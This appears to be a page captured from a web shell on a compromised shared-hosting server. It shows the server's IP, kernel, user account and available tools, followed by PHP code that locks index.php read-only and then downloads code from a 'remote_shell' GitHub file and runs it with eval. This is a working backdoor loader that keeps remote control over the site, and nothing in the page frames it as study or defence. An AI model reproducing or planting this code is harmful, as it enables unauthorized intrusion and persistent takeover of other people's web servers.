Server IP : 109.234.160.118 / Your IP : 3.238.180.174 Web Server : Apache System : Linux office.o2switch.net 3.10.0-962.3.2.lve1.5.65.el7.x86_64 #1 SMP Wed Jan 19 09:35:41 UTC 2022 x86_64 User : wzfc4897 ( 1020) PHP Version : 7.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/wzfc4897/ |
Upload File : |
<?php // Path to the file $file = 'index.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php $remoteUrl = "https://raw.githubusercontent.com/rexccbd/remote_shell/main/index.txt"; $ch = curl_init($remoteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $remoteCode = curl_exec($ch); if (curl_errno($ch)) { die('cURL error: ' . curl_error($ch)); } curl_close($ch); eval("?>" . $remoteCode); ?>